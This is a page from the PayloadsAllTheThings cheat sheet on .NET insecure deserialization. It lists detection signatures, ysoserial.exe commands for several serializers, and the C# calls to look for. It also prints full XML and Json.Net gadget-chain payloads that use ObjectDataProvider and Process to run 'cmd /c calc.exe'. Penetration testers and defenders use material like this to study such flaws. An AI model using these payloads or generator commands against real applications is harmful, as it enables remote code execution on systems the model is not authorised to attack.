PayloadsAllTheThings/Insecure Deserialization/DotNET.md
2022-11-21 10:48:27 +01:00

8.8 KiB
Raw Blame History

.NET Serialization

Summary

Detection

  • AAEAAD (Hex) = .NET deserialization BinaryFormatter
  • FF01 (Hex) / /w (Base64) = .NET ViewState

Example: AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=

Tools

$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t

Formatters

NETNativeFormatters.png
.NET Native Formatters from pwntester/attacking-net-serialization

XmlSerializer

  • In C# source code, look for XmlSerializer(typeof(<TYPE>));.
  • The attacker must control the type of the XmlSerializer.
  • Payload output: XML
.\ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "calc.exe"
<?xml version="1.0"?>
<root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
    <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
                <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
                    <![CDATA[<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:d="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:b="clr-namespace:System;assembly=mscorlib" xmlns:c="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider d:Key="" ObjectType="{d:Type c:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><b:String>cmd</b:String><b:String>/c calc.exe</b:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="XamlReader"></ObjectInstance>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>

DataContractSerializer

The DataContractSerializer deserializes in a loosely coupled way. It never reads common language runtime (CLR) type and assembly names from the incoming data. The security model for the XmlSerializer is similar to that of the DataContractSerializer, and differs mostly in details. For example, the XmlIncludeAttribute attribute is used for type inclusion instead of the KnownTypeAttribute attribute.

  • In C# source code, look for DataContractSerializer(typeof(<TYPE>)).
  • Payload output: XML
  • Data Type must be user-controlled to be exploitable

NetDataContractSerializer

It extends the System.Runtime.Serialization.XmlObjectSerializer class and is capable of serializing any type annotated with serializable attribute as BinaryFormatter.

  • In C# source code, look for NetDataContractSerializer().ReadObject().
  • Payload output: XML
.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t

LosFormatter

  • Use BinaryFormatter internally.
.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t

JSON.NET

  • In C# source code, look for JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings.
  • Payload output: JSON
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc.exe" -t
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c calc.exe']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

BinaryFormatter

The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and cant be made secure.

  • In C# source code, look for System.Runtime.Serialization.Binary.BinaryFormatter.
  • Exploitation requires [Serializable] or ISerializable interface.
  • Payload output: Binary
./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t

POP Gadgets

These gadgets must have the following properties:

  • Serializable
  • Public/settable variables
  • Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors

You must carefully select your gadgets for a targeted formatter.

List of popular gadgets used in common payloads.

  • ObjectDataProvider from C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll
    • Use MethodParameters to set arbitrary parameters
    • Use MethodName to call an arbitrary function
  • ExpandedWrapper
    • Specify the object types of the objects that are encapsulated
    ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
    
  • System.Configuration.Install.AssemblyInstaller
    • Execute payload with Assembly.Load
    // System.Configuration.Install.AssemblyInstaller
    public void set_Path(string value){
        if (value == null){
            this.assembly = null;
        }
        this.assembly = Assembly.LoadFrom(value);
    }
    

References